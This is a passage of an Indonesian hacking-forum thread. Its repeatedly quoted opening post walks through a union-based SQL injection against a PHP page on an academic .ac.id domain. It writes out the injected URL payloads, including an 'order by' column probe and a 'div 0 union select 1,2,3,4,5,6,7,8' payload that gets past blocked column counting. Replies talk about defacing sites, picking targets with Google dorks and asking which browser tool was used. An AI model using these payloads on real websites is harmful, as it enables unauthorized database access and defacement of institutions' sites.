[Share] SQL Injection 'order by 10000' and still not error?
#11
(02-26-2014, 10:32 PM)wine trochanter Wrote: assalamualaikum
okay sesuai judul
[hide]
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan
target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2
Spoiler! :
[Image: 1.png]

coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya
Spoiler! :
[Image: 2.png]

wew pas di kecilin muncul lagi tulisan nya
Spoiler! :
[Image: 3.png]

berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya
[spolier][Image: 4.png][/spoiler]

coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -
Spoiler! :
[Image: 5.png]

dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya[/hide]

udah gitu aja, semoga bermanfaat

nah ane selalu mentok disini nih kalo belajar sql injection Big Grin jadinya gak pernah bisa nge-deface wkwk
ane mau nanya om, dasar sih sebenernya, untuk dapet target webnya itu pakek apa? google dork gitu ya om ?

#12
(12-05-2014, 11:18 PM)bl4ckrayyah Wrote:
(02-26-2014, 10:32 PM)wine trochanter Wrote: assalamualaikum
okay sesuai judul
[hide]
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan
target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2
Spoiler! :
[Image: 1.png]

coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya
Spoiler! :
[Image: 2.png]

wew pas di kecilin muncul lagi tulisan nya
Spoiler! :
[Image: 3.png]

berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya
[spolier][Image: 4.png][/spoiler]

coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -
Spoiler! :
[Image: 5.png]

dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya[/hide]

udah gitu aja, semoga bermanfaat

nah ane selalu mentok disini nih kalo belajar sql injection Big Grin jadinya gak pernah bisa nge-deface wkwk
ane mau nanya om, dasar sih sebenernya, untuk dapet target webnya itu pakek apa? google dork gitu ya om ?

waduuh kalo jawab kayak gini bingung
ane jg g tau gunain dork yg bagus gmna
ane mah main feeling aja Big Grin
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#13
(02-26-2014, 10:32 PM)wine trochanter Wrote: assalamualaikum
okay sesuai judul
[hide]
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan
target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2
Spoiler! :
[Image: 1.png]

coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya
Spoiler! :
[Image: 2.png]

wew pas di kecilin muncul lagi tulisan nya
Spoiler! :
[Image: 3.png]

berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya
[spolier][Image: 4.png][/spoiler]

coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -
Spoiler! :
[Image: 5.png]

dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya[/hide]

udah gitu aja, semoga bermanfaat

(12-05-2014, 11:40 PM)wine trochanter Wrote:
(12-05-2014, 11:18 PM)bl4ckrayyah Wrote:
(02-26-2014, 10:32 PM)wine trochanter Wrote: assalamualaikum
okay sesuai judul
[hide]
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan
target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2
Spoiler! :
[Image: 1.png]

coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya
Spoiler! :
[Image: 2.png]

wew pas di kecilin muncul lagi tulisan nya
Spoiler! :
[Image: 3.png]

berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya
[spolier][Image: 4.png][/spoiler]

coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -
Spoiler! :
[Image: 5.png]

dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya[/hide]

udah gitu aja, semoga bermanfaat

nah ane selalu mentok disini nih kalo belajar sql injection Big Grin jadinya gak pernah bisa nge-deface wkwk
ane mau nanya om, dasar sih sebenernya, untuk dapet target webnya itu pakek apa? google dork gitu ya om ?

waduuh kalo jawab kayak gini bingung
ane jg g tau gunain dork yg bagus gmna
ane mah main feeling aja Big Grin

sebenernya bingung soalnya gimana caranya dapet itu website dengan informasi begitu di linknya hehe

#14
(12-05-2014, 11:18 PM)bl4ckrayyah Wrote:
(02-26-2014, 10:32 PM)wine trochanter Wrote: assalamualaikum
okay sesuai judul
[hide]
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan
target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2
Spoiler! :
[Image: 1.png]

coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya
Spoiler! :
[Image: 2.png]

wew pas di kecilin muncul lagi tulisan nya
Spoiler! :
[Image: 3.png]

berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya
[spolier][Image: 4.png][/spoiler]

coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -
Spoiler! :
[Image: 5.png]

dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya[/hide]

udah gitu aja, semoga bermanfaat

nah ane selalu mentok disini nih kalo belajar sql injection Big Grin jadinya gak pernah bisa nge-deface wkwk
ane mau nanya om, dasar sih sebenernya, untuk dapet target webnya itu pakek apa? google dork gitu ya om ?

yaa sebenernya klo udh paham sqli sih gak perlu make dork juga bisa, seperti yg om wine bilang main Feeling aja :v
Jangan Makan Tulang Kawan | Kurawa |

#15
(02-26-2014, 10:32 PM)wine trochanter Wrote: assalamualaikum
okay sesuai judul
[hide]
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan
target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2
Spoiler! :
[Image: 1.png]

coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya
Spoiler! :
[Image: 2.png]

wew pas di kecilin muncul lagi tulisan nya
Spoiler! :
[Image: 3.png]

berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya
[spolier][Image: 4.png][/spoiler]

coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -
Spoiler! :
[Image: 5.png]

dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya[/hide]

udah gitu aja, semoga bermanfaat

(12-06-2014, 11:30 AM)Kresna Wrote:
(12-05-2014, 11:18 PM)bl4ckrayyah Wrote:
(02-26-2014, 10:32 PM)wine trochanter Wrote: assalamualaikum
okay sesuai judul
[hide]
jadi permasalahan nya pada SQL injection perintah order by nya di block, atau tidak menghasilkan
target:target.ac.id/bid/utama.php?mod=detail&id=77

coba kita masukkan perintah
target.ac.id/bid/utama.php?mod=detail&id=77 order by 100-- << tidak menampilkan unknow columns
coba kita tambah jadi target.ac.id/bid/utama.php?mod=detail&id=77 order by 1000-- << sama tidak menampilkan apa2
Spoiler! :
[Image: 1.png]

coba kita ganti perintah nya seperti ini
.ac.id/bid/utama.php?mod=detail&id=77' order by 100-- -
hemm gk keluar apa2, malah blank :v
coba kecilin lg order by nya
Spoiler! :
[Image: 2.png]

wew pas di kecilin muncul lagi tulisan nya
Spoiler! :
[Image: 3.png]

berarti kita asumsikan ada 8 kolom
coba kita tes dan ternyata gk keluar angka ajaib nya
[spolier][Image: 4.png][/spoiler]

coba kita ganti perintah nya dg ini
target.ac.id/bid/utama.php?mod=detail&id=77' div 0 union select 1,2,3,4,5,6,7,8-- -
Spoiler! :
[Image: 5.png]

dan tarraaa keluar angka ajaib nya
selanjut nya sama seperti syntax sqli biasa nya[/hide]

udah gitu aja, semoga bermanfaat

nah ane selalu mentok disini nih kalo belajar sql injection Big Grin jadinya gak pernah bisa nge-deface wkwk
ane mau nanya om, dasar sih sebenernya, untuk dapet target webnya itu pakek apa? google dork gitu ya om ?

yaa sebenernya klo udh paham sqli sih gak perlu make dork juga bisa, seperti yg om wine bilang main Feeling aja :v

hmm oke oke om ane coba nanti hehe

#16
nambah ilmu lagi dah Big Grin
mkasih info nya

#17
maksudnya query "div 0" apaan bro ?

mohon pencerahannya sobat Big Grin

#18
Wink 
sekarang udah jarang ya bro website ada yg vuln sql injection

#19
(12-05-2014, 09:12 PM)Kresna Wrote: nice share om , cek kulkas Big Grin

om itu mozila nya pake extension apa? ane mau belajar

#20
Apa nama tools yang ada di mozilla itu kak masih awam ni Big Grin






Users browsing this thread: 1 Guest(s)